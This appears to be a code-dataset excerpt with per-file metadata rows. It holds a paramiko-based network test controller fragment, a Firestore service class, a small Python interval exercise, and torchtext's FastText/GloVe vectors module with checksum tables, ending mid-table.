sup.switch_portset(HOST,USER,PASSWORD,PORT,PC1_vlan,PC1_normal,PC1_fixed,PC1_forbidden)
sup.switch_portset(HOST,USER,PASSWORD,PORT,PC2_vlan,PC2_normal,PC2_fixed,PC2_forbidden)
# 把所有寫死的參數全部改成從config抓取變數,包含set_netns.sh(另寫一支子程式呼叫set_netns並修改參數)
HOST_net0 = sup.config_file(control_config, "Control Panel", "HOST_net0")
USER_net0 = sup.config_file(control_config, "Control Panel", "USER_net0")
PASSWORD_net0 = sup.config_file(control_config, "Control Panel", "PASSWORD_net0")
PORT_net0 = sup.config_file(control_config, "Control Panel", "PORT_net0")
HOST_net1 = sup.config_file(control_config, "Control Panel", "HOST_net1")
USER_net1 = sup.config_file(control_config, "Control Panel", "USER_net1")
PASSWORD_net1 = sup.config_file(control_config, "Control Panel", "PASSWORD_net1")
PORT_net1 = sup.config_file(control_config, "Control Panel", "PORT_net1")
### 將檔案壓縮存到特定位址 ###
sup.zip_dir(zip_dir_srcPath,zip_dir_dstname)
### 將壓縮檔案傳送到client並進行指令控制 ###
sup.paramiko_net0(HOST_net0,USER_net0,PASSWORD_net0,PORT_net0,source_code_local,source_code_client)
sup.paramiko_net1(HOST_net1,USER_net1,PASSWORD_net1,PORT_net1,source_code_local,source_code_client)
sup.paramiko_link(HOST_net0,USER_net0,PASSWORD_net0,PORT_net0,main_local,main_client,source_code_local,source_code_client,result_client,result_local,i)
### 解壓縮client蒐集到的封包 ###
sup.unzip_dir("%s\\Result%s.zip" %(sup.config_file(control_config, "Control Panel", "unzip_dir_srcName"),int(i/2)+1),"%s\\Result%s"%(sup.config_file(control_config, "Control Panel", "unzip_dir_dstPath"),int(i/2)+1))
### 呼叫fork子程式 ###
commandText = "python "+'"' + analyze + '"'
os.system(commandText)
| 62.099099 | 219 | 0.759611 | 978 | 6,893 | 5.00818 | 0.144172 | 0.161903 | 0.127399 | 0.191915 | 0.597999 | 0.563291 | 0.495304 | 0.322172 | 0.110657 | 0.073091 | 0 | 0.015858 | 0.103438 | 6,893 | 110 | 220 | 62.663636 | 0.776699 | 0.146525 | 0 | 0.024691 | 0 | 0 | 0.241355 | 0.058264 | 0.012346 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.111111 | 0.049383 | 0 | 0.049383 | 0.012346 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
72b540a0cdd8519bd2e5f6934e0471e769a83660 | 1,945 | py | Python | src/service/firebase/firebaseService.py | CabraKill/HiHome-API | 52852cc90f661c42596fb89b4d287f8d05de2911 | [
"MIT"
] | null | null | null | src/service/firebase/firebaseService.py | CabraKill/HiHome-API | 52852cc90f661c42596fb89b4d287f8d05de2911 | [
"MIT"
] | null | null | null | src/service/firebase/firebaseService.py | CabraKill/HiHome-API | 52852cc90f661c42596fb89b4d287f8d05de2911 | [
"MIT"
] | null | null | null | from typing import Any, Callable, Generator
from google.cloud.firestore_v1.base_document import DocumentSnapshot
from google.cloud.firestore_v1.collection import CollectionReference
from src.service.firebase.models.documentAPIModel import DocumentFirebaseAPIModel
from src.service.firebase.models.documentEntity import DocumentFirebaseEntity
from src.service.firebase.Ifirebase import IFirebase
from google.cloud.firestore import Client
class FirebaseAPIService(IFirebase):
def __init__(self, project_name: str):
self.project_name = project_name
super().__init__()
def init(self):
print("FirebaseService initiated.")
self.db = Client(project=self.project_name)
def getDb(self) -> Client:
return super().getDb()
def getCollection(self, path: str) -> CollectionReference:
collection = self.db.collection(path)
return collection
def getDocumentCollection(self, path: str) -> Generator[Any, Any, None]:
documents = self.db.collection(path).list_documents()
print(type(documents))
return documents
def getDocumentReference(self, path: str) -> DocumentFirebaseEntity:
documentReference = self.db.document(path)
return documentReference
def getDocument(self, path: str) -> DocumentFirebaseEntity:
documentReference = self.db.document(path)
document = DocumentFirebaseAPIModel(
documentReference=documentReference)
return document
def setActionForDocumentChange(self, path: str, function: Callable):
document = self.db.document(path) # .where(u'state', u'==', u'CA')
query_watch = document.on_snapshot(function)
def updateDocument(self, house_name:str, id:str, document: DocumentFirebaseEntity):
document_dict = document.toDict()
print(document_dict)
# self.db.collection(f'{house_name}/devices').add(document_dict)
| 38.137255 | 87 | 0.717224 | 203 | 1,945 | 6.758621 | 0.334975 | 0.030612 | 0.040087 | 0.052478 | 0.177843 | 0.099125 | 0.099125 | 0.099125 | 0.099125 | 0 | 0 | 0.001269 | 0.189717 | 1,945 | 50 | 88 | 38.9 | 0.869289 | 0.047815 | 0 | 0.054054 | 0 | 0 | 0.014062 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.243243 | false | 0 | 0.189189 | 0.027027 | 0.594595 | 0.081081 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
72b8d1d2806cdbe91d22ab22337f973ebef61afc | 308 | py | Python | 1037 INTERVALO.py | castrolimoeiro/Uri-exercise | 7a9227c55a79f14fe8bde4aa0ebb4c268bbda4bb | [
"MIT"
] | null | null | null | 1037 INTERVALO.py | castrolimoeiro/Uri-exercise | 7a9227c55a79f14fe8bde4aa0ebb4c268bbda4bb | [
"MIT"
] | null | null | null | 1037 INTERVALO.py | castrolimoeiro/Uri-exercise | 7a9227c55a79f14fe8bde4aa0ebb4c268bbda4bb | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
valor = float(input())
if 0 < valor <= 25:
print('Intervalo [0, 25]')
elif 25 < valor <= 50:
print('Intervalo (25, 50]')
elif 50 < valor <= 75:
print('Intervalo (50, 75]')
elif 75 < valor <= 100:
print('Intervalo (75, 100]')
else:
print('Fora de intervalo')
| 16.210526 | 32 | 0.555195 | 43 | 308 | 3.976744 | 0.418605 | 0.327485 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141026 | 0.24026 | 308 | 18 | 33 | 17.111111 | 0.589744 | 0.068182 | 0 | 0 | 0 | 0 | 0.312281 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.454545 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
72bae2351bed5ed680b691cd8942a672df42bd98 | 36,767 | py | Python | torchtext/experimental/vectors.py | zacker150/text | 742e1d3eced47905bc73271b6f4a42a6489be58c | [
"BSD-3-Clause"
] | null | null | null | torchtext/experimental/vectors.py | zacker150/text | 742e1d3eced47905bc73271b6f4a42a6489be58c | [
"BSD-3-Clause"
] | null | null | null | torchtext/experimental/vectors.py | zacker150/text | 742e1d3eced47905bc73271b6f4a42a6489be58c | [
"BSD-3-Clause"
] | null | null | null | import logging
import torch
from torch import Tensor
import torch.nn as nn
from typing import List
from torchtext.utils import (
download_from_url,
extract_archive
)
from torchtext._torchtext import (
Vectors as VectorsPybind,
_load_token_and_vectors_from_file
)
__all__ = [
'FastText',
'GloVe',
'load_vectors_from_file_path',
'build_vectors',
'Vectors'
]
logger = logging.getLogger(__name__)
def FastText(language="en", unk_tensor=None, root=".data", validate_file=True, num_cpus=32):
r"""Create a FastText Vectors object.
Args:
language (str): the language to use for FastText. The list of supported languages options
can be found at https://fasttext.cc/docs/en/language-identification.html
unk_tensor (Tensor): a 1d tensor representing the vector associated with an unknown token
root (str): folder used to store downloaded files in. Default: '.data'.
validate_file (bool): flag to determine whether to validate the downloaded files checksum.
Should be `False` when running tests with a local asset.
num_cpus (int): the number of cpus to use when loading the vectors from file. Default: 10.
Returns:
Vectors: a Vectors object.
Raises:
ValueError: if duplicate tokens are found in FastText file.
"""
url = "https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.{}.vec".format(language)
checksum = None
if validate_file:
checksum = CHECKSUMS_FAST_TEXT.get(url, None)
downloaded_file_path = download_from_url(url, root=root, hash_value=checksum)
cpp_vectors_obj, dup_tokens = _load_token_and_vectors_from_file(downloaded_file_path, ' ', num_cpus, unk_tensor)
if dup_tokens:
raise ValueError("Found duplicate tokens in file: {}".format(str(dup_tokens)))
vectors_obj = Vectors(cpp_vectors_obj)
return vectors_obj
def GloVe(name="840B", dim=300, unk_tensor=None, root=".data", validate_file=True, num_cpus=32):
r"""Create a GloVe Vectors object.
Args:
name (str): the name of the GloVe dataset to use. Options are:
- 42B
- 840B
- twitter.27B
- 6B
dim (int): the dimension for the GloVe dataset to load. Options are:
42B:
- 300
840B:
- 300
twitter.27B:
- 25
- 50
- 100
- 200
6B:
- 50
- 100
- 200
- 300
unk_tensor (Tensor): a 1d tensor representing the vector associated with an unknown token.
root (str): folder used to store downloaded files in (.data)
validate_file (bool): flag to determine whether to validate the downloaded files checksum.
Should be `False` when running tests with a local asset.
num_cpus (int): the number of cpus to use when loading the vectors from file. Default: 10.
Returns:
Vectors: a Vectors object.
Raises:
ValueError: if unexpected duplicate tokens are found in GloVe file.
"""
dup_token_glove_840b = ["����������������������������������������������������������������������"
"����������������������������������������������������������������������"
"����������������������������������������������������������������������"
"����������������������������������������������������������������������"
"������������������������������������������������������"]
urls = {
"42B": "https://nlp.stanford.edu/data/glove.42B.300d.zip",
"840B": "https://nlp.stanford.edu/data/glove.840B.300d.zip",
"twitter.27B": "https://nlp.stanford.edu/data/glove.twitter.27B.zip",
"6B": "https://nlp.stanford.edu/data/glove.6B.zip",
}
valid_glove_file_names = {
"glove.42B.300d.txt",
"glove.840B.300d.txt",
"glove.twitter.27B.25d.txt",
"glove.twitter.27B.50d.txt",
"glove.twitter.27B.100d.txt",
"glove.twitter.27B.200d.txt",
"glove.6B.50d.txt",
"glove.6B.100d.txt",
"glove.6B.200d.txt",
"glove.6B.300d.txt"
}
file_name = "glove.{}.{}d.txt".format(name, str(dim))
if file_name not in valid_glove_file_names:
raise ValueError("Could not find GloVe file with name {}. Please check that `name` and `dim`"
"are valid.".format(str(file_name)))
url = urls[name]
checksum = None
if validate_file:
checksum = CHECKSUMS_GLOVE.get(url, None)
downloaded_file_path = download_from_url(url, root=root, hash_value=checksum)
extracted_file_paths = extract_archive(downloaded_file_path)
# need to get the full path to the correct file in the case when multiple files are extracted with different dims
extracted_file_path_with_correct_dim = [path for path in extracted_file_paths if file_name in path][0]
cpp_vectors_obj, dup_tokens = _load_token_and_vectors_from_file(extracted_file_path_with_correct_dim, ' ', num_cpus, unk_tensor)
# Ensure there is only 1 expected duplicate token present for 840B dataset
if dup_tokens and dup_tokens != dup_token_glove_840b:
raise ValueError("Found duplicate tokens in file: {}".format(str(dup_tokens)))
vectors_obj = Vectors(cpp_vectors_obj)
return vectors_obj
def load_vectors_from_file_path(filepath, delimiter=",", unk_tensor=None, num_cpus=10):
r"""Create a Vectors object from a csv file path.
Note that the tensor corresponding to each vector is of type `torch.float`.
Format for csv file:
token1<delimiter>num1 num2 num3
token2<delimiter>num4 num5 num6
...
token_n<delimiter>num_m num_j num_k
Args:
filepath: a file path to read data from.
delimiter (char): a character to delimit between the token and the vector. Default value is ","
unk_tensor (Tensor): a 1d tensor representing the vector associated with an unknown token.
num_cpus (int): the number of cpus to use when loading the vectors from file. Default: 10.
Returns:
Vectors: a Vectors object.
Raises:
ValueError: if duplicate tokens are found in FastText file.
"""
vectors_obj, dup_tokens = _load_token_and_vectors_from_file(filepath, delimiter, num_cpus, unk_tensor)
if dup_tokens:
raise ValueError("Found duplicate tokens in file: {}".format(str(dup_tokens)))
return Vectors(vectors_obj)
def build_vectors(tokens, vectors, unk_tensor=None):
r"""Factory method for creating a vectors object which maps tokens to vectors.
Args:
tokens (List[str]): a list of tokens.
vectors (torch.Tensor): a 2d tensor representing the vector associated with each token.
unk_tensor (torch.Tensor): a 1d tensors representing the vector associated with an unknown token.
Raises:
ValueError: if `vectors` is empty and a default `unk_tensor` isn't provided.
RuntimeError: if `tokens` and `vectors` have different sizes or `tokens` has duplicates.
TypeError: if all tensors within`vectors` are not of data type `torch.float`.
"""
if unk_tensor is None and (vectors is None or not len(vectors)):
raise ValueError("The vectors list is empty and a default unk_tensor wasn't provided.")
if not vectors.dtype == torch.float:
raise TypeError("`vectors` should be of data type `torch.float`.")
indices = [i for i in range(len(tokens))]
unk_tensor = unk_tensor if unk_tensor is not None else torch.zeros(vectors[0].size(), dtype=torch.float)
return Vectors(VectorsPybind(tokens, indices, vectors, unk_tensor))
class Vectors(nn.Module):
__jit_unused_properties__ = ["is_jitable"]
r"""Creates a vectors object which maps tokens to vectors.
Args:
vectors (torch.classes.torchtext.Vectors or torchtext._torchtext.Vectors): a cpp vectors object.
"""
def __init__(self, vectors):
super(Vectors, self).__init__()
self.vectors = vectors
@property
def is_jitable(self):
return not isinstance(self.vectors, VectorsPybind)
@torch.jit.export
def forward(self, tokens: List[str]) -> Tensor:
r"""Calls the `lookup_vectors` method
Args:
tokens: a list of string tokens
Returns:
vectors (Tensor): returns a 2-D tensor of shape=(len(tokens), vector_dim) or an
empty tensor if `tokens` is empty
"""
return self.vectors.lookup_vectors(tokens)
@torch.jit.export
def __getitem__(self, token: str) -> Tensor:
r"""
Args:
token (str): the token used to lookup the corresponding vector.
Returns:
vector (Tensor): a tensor (the vector) corresponding to the associated token.
"""
return self.vectors[token]
@torch.jit.export
def __setitem__(self, token: str, vector: Tensor) -> None:
r"""
Args:
token (str): the token used to lookup the corresponding vector.
vector (Tensor): a 1d tensor representing a vector associated with the token.
Raises:
TypeError: if `vector` is not of data type `torch.float`.
"""
if vector.dtype != torch.float:
raise TypeError("`vector` should be of data type `torch.float` but it's of type " + str(vector.dtype))
self.vectors[token] = vector.float()
@torch.jit.export
def __len__(self) -> int:
r"""Get length of vectors object.
Returns:
length (int): the length of the vectors.
"""
return len(self.vectors)
@torch.jit.export
def lookup_vectors(self, tokens: List[str]) -> Tensor:
"""Look up embedding vectors for a list of tokens.
Args:
tokens: a list of tokens
Returns:
vectors (Tensor): returns a 2-D tensor of shape=(len(tokens), vector_dim) or an empty tensor if `tokens` is empty
Examples:
>>> examples = ['chip', 'baby', 'Beautiful']
>>> vec = text.vocab.GloVe(name='6B', dim=50)
>>> ret = vec.get_vectors_by_tokens(tokens)
"""
if not len(tokens):
return torch.empty(0, 0)
return self.vectors.lookup_vectors(tokens)
def to_ivalue(self):
r"""Return a JITable Vectors.
"""
stoi = self.vectors.get_stoi()
cpp_vectors = torch.classes.torchtext.Vectors(list(stoi.keys()), list(stoi.values()), self.vectors.vectors_, self.vectors.unk_tensor_)
return(Vectors(cpp_vectors))
CHECKSUMS_GLOVE = {
"https://nlp.stanford.edu/data/glove.42B.300d.zip":
"03d5d7fa28e58762ace4b85fb71fe86a345ef0b5ff39f5390c14869da0fc1970",
"https://nlp.stanford.edu/data/glove.840B.300d.zip":
"c06db255e65095393609f19a4cfca20bf3a71e20cc53e892aafa490347e3849f",
"https://nlp.stanford.edu/data/glove.twitter.27B.zip":
"792af52f795d1a32c9842a3240f5f3fe5e941a8ff6df5eb0f9d668092ebc019c",
"https://nlp.stanford.edu/data/glove.6B.zip":
"617afb2fe6cbd085c235baf7a465b96f4112bd7f7ccb2b2cbd649fed9cbcf2fb"
}
CHECKSUMS_FAST_TEXT = {
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.am.vec":
"b532c57a74628fb110b48b9d8ae2464eb971df2ecc43b89c2eb92803b8ac92bf",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.als.vec":
"056a359a2651a211817dbb7885ea3e6f69e0d6048d7985eab173858c59ee1adf",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.af.vec":
"87ecbfea969eb707eab72a7156b4318d341c0652e6e5c15c21bc08f5cf458644",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.an.vec":
"57db91d8c307c45613092ebfd405061ccfdec5905035d9a8ad364f6b8ce41b29",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ar.vec":
"5527041ce04fa66e45e27d7bd278f00425d97fde8c67755392d70f112fecc356",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.arz.vec":
"0b6c261fd179e5d030f2b363f9f7a4db0a52e6241a910b39fb3332d39bcfbec3",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.as.vec":
"4475daa38bc1e8501e54dfcd79a1a58bb0771b347ad9092ce9e57e9ddfdd3b07",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.av.vec":
"1292eed7f649687403fac18e0ee97202e163f9ab50f6efa885aa2db9760a967e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ast.vec":
"fbba958174ced32fde2593f628c3cf4f00d53cd1d502612a34e180a0d13ce037",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.be.vec":
"3b36ba86f5b76c40dabe1c7fc3214338d53ce7347c28bb2fba92b6acc098c6ad",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.az.vec":
"93ebe624677a1bfbb57de001d373e111ef9191cd3186f42cad5d52886b8c6467",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ba.vec":
"b739fd6f9fe57205314d67a7975a2fc387b55679399a6b2bda0d1835b1fdd5a8",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.azb.vec":
"05709ce8abc91115777f3cc2574d24d9439d3f6905500163295d695d41260a06",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bar.vec":
"3f58304eb0345d96c0abbffb61621c1f6ec2ca39e13272b434cc6cc2bde052a1",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bcl.vec":
"309bb74a85647ac3a5be53fd9d3be3196cff385d257561f4183a0d91a67f0c8b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bg.vec":
"16f1a02f3b708f2cbc04971258b0febdfc9ed4e64fcc3818cc6a397e3db5cf81",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bh.vec":
"ab0819c155fd1609393f8af74794de8d5b49db0787edf136e938ea2c87993ab5",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bn.vec":
"3dd27b9b271c203a452de1c533fdf975ebec121f17f945ef234370358db2bae6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bpy.vec":
"2ba9f046d70bdaae2cbd9d33f9a1d2913637c00126588cc3223ba58ca80d49fe",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bo.vec":
"c5ed2a28edf39bc100f4200cdf1c9d3c1448efefcb3d78db8becea613a2fb2eb",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.br.vec":
"fe858e2be787351cce96c206a9034c361e45f8b9e0a385aacfce3c73f844e923",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.da.vec":
"397b0c3e18f710fb8aa1caf86441a25af2f247335e8560dbe949feb3613ef5cc",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bs.vec":
"ee065fe168c0a4f1a0b9fbd8854be4572c138a414fd7200381d0135ce6c03b49",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.bxr.vec":
"0bc0e47a669aa0d9ad1c665593f7257c4b27a4e3becce457a7348da716bdabb4",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ca.vec":
"1600696088c7f2fe555eb6a4548f427f969a450ed0313d68e859d6024242db5f",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.cbk.vec":
"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ceb.vec":
"7fbe4474043e4f656eb2f81ee03d1e863cef8e62ad4e3bd9a3a4143785752568",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ce.vec":
"2a321e2de98d0abb5a12599d9567dd5ac93f9e2599251237026acff35f23cef8",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.cs.vec":
"0eba2ac0852b1057909d4e8e5e3fa75470f9cb9408b364433ac4747eb2b568a9",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.cv.vec":
"67f09d353f2561b16c385187789eb6ff43fa125d3cc81081b2bc7d062c9f0b8a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.cy.vec":
"1023affdcb7e84dd59b1b7de892f65888b6403e2ed4fd77cb836face1c70ee68",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.co.vec":
"7f16f06c19c8528dc48a0997f67bf5f0d79da2d817247776741b54617b6053d9",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ckb.vec":
"ef3a8472cc2ac86976a1a91cde3edc7fcd1d1affd3c6fb6441451e9fbc6c3ae8",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.de.vec":
"3020c26e32238ba95a933926763b5c693bf7793bf0c722055cecda1e0283578c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.diq.vec":
"6f71204e521e03ae70b4bd8a41c50cc72cd4b8c3e242a4ab5c77670603df1b42",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.dty.vec":
"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.dv.vec":
"2b4f19bfcf0d38e6ab54e53d752847ab60f4880bae955fff2c485135e923501e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.dsb.vec":
"ed6699709e0e2f2e3b4a4e32ef3f98f0ccb3f1fed2dad41b7a6deafdc2b32acf",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.el.vec":
"a397de14c637f0b843fcda8724b406f5a7fe9f3ead7f02cfcaeed43858212da6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.en.vec":
"ba5420ac217fb34f15f58ded0d911a4370dfb1f3341fa7511a49ae74c87de282",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.eml.vec":
"a81f0a05c9d3ffd310f6e2d864ee48bff952dbfb2612293b58ab7bc49755cfe6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.es.vec":
"cf2e9a1976055a18ad358fb0331bc5f9b2e8541d6d4903b562a63b60f3ae392e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.et.vec":
"de15792f8373f27f1053eef28cff4c782c4b440fd57a3472af38e5bf94eafda6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.eo.vec":
"a137201c5cf54e218b6bb0bac540beaee2e81e285bf9c59c0d57e0a85e3353c0",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.fi.vec":
"63017414860020f7409d31c8b65c1f8ed0a64fe11224d4e82e17667ce0fbd0c5",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.fa.vec":
"da0250d60d159820bf0830499168c2f4f1eaffe74f1508c579ca9b41bae6c53f",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.eu.vec":
"93f6e44742ea43ff11b5da4c634ebf73f3b1aa3e9485d43eb27bd5ee3979b657",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ilo.vec":
"e20ac3c7ef6a076315f15d9c326e93b22c2d5eee6bec5caef7bab6faf691b13a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.frr.vec":
"a39b393261a8a5c19d97f6a085669daa9e0b9a0cab0b5cf5f7cb23f6084c35e0",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ga.vec":
"7b33e77e9feb32a6ce2f85ab449516294a616267173c6bbf8f1de5c2b2885699",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.fy.vec":
"07b695f598e2d51cdd17359814b32f15c56f5beaa7a6b49f69de835e13a212b8",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.fr.vec":
"bc68b0703375da9e81c3c11d0c28f3f8375dd944c209e697c4075e579455ac2a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.gd.vec":
"464e8b97a8b262352a0dc663aa22f98fc0c3f9e7134a749644ad07249dbd42e8",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.gn.vec":
"5d2ac06649f6199ffad8480efa03f97d2910d1501a4528bfb013524d6f2d6c2b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.gl.vec":
"b4b6233b0c650f9d665e5c8aa372f8745d1a40868f93ecf87f026c60b2bb0f9e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.gu.vec":
"910296b888e17416e9af43f636f83bbe0b81da68b5e62139ab9c06671dbbacf1",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.gom.vec":
"20f38a650e90a372a92a1680c6a92fc1d89c21cd41835c8d0e5e42f30d52b7ec",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.hi.vec":
"e5ec503a898207e17a7681d97876607b0481384b6c1cc4c9c6b6aaba7ad293d0",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.gv.vec":
"b9d6384219d999e43f66ace6decd80eb6359e0956c61cb7049021b194c269ffe",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.he.vec":
"5d861a705bf541671c0cee731c1b71f6a65d8defd3df2978a7f83e8b0580903b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.hif.vec":
"445e65668be650f419e0a14791b95c89c3f4142d32371501e53038749eb2c71c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.hsb.vec":
"27be86ce2435dfeb07d76d406a8ec7b46ebf9b6b8fb5da24208eca1492ffe5bb",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.hr.vec":
"4d42787554747a86253a23e9a830a8571faea0b622e48ed136f8b9817dea9da3",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ht.vec":
"be5e089f22a43ca00a35467545bc6cca15b5c5951ac34c504a23686ab735e995",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.hy.vec":
"63dc48faeb4f3c5ea2e6f78a0bf4d8bf3d623af52b7f3a9b9e5984dbc79ba66f",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.hu.vec":
"766de324b4783fe2d31df8f78966ea088712a981b6b0b5336bc71938773fe21e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ia.vec":
"1ec19501030cafa0fdccf7f4c5794f4cd7e795b015330f6ea6bc9eff97eaeca5",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ie.vec":
"41c9e34f5445c4aafd7f5d52665b9aa89fb3c76b5262e9401d21b58dd2e53609",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.id.vec":
"436180ac3d405eefe8c2be20ae3e67cddc866afb94e486afcbaef549c24b7d60",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.io.vec":
"2bedf13a6d751ad5191474e65b6104fa3175ca4c3f9ade214f25cfeede1c9c8c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.is.vec":
"7fe6d8eca113e245ea5467e8f4cab9697dff1d623ac0a8e6fdaca0a93d7fc6f3",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.it.vec":
"5a9d111edd3f199e7379373ba18f4e5317c6c6c5053a9d6d0a56f32298d3bde4",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ja.vec":
"b44b2eef8bdcf0739c971c4ff7fcae7a300b5e06cf0e50c5787082957ad9d998",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.jv.vec":
"4a46ac08781861d6e19fcc70a421340b627889a054279dacee0f32ee12b1f4f7",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.jbo.vec":
"766c0eb15b1e2cad9a14d0a0937e859e20f6f2ed203ff7ba4f3c70d3b1888d2b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ka.vec":
"10b08b9372ef6e44e0e826e6a8d01b3396a319d78ce2db990c51d688c2d0259e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.kk.vec":
"2dabc86ed917ba236c96c8c327aa3394f32ea511068a9dce205a46923c5716d1",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.kn.vec":
"7f9ab4985e0d5f91462fbdcbfbfaeef619d973e638fbc7c928cfcc5bd37d473b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.km.vec":
"bf35b294d86fceac916feee3e167fe6aee3fe73380f78e5377c94ff0d023b77c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ko.vec":
"44bae904dd7923d1178e83067cc42d9437097f7e86cb83bdd8281febe4b9adaa",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.krc.vec":
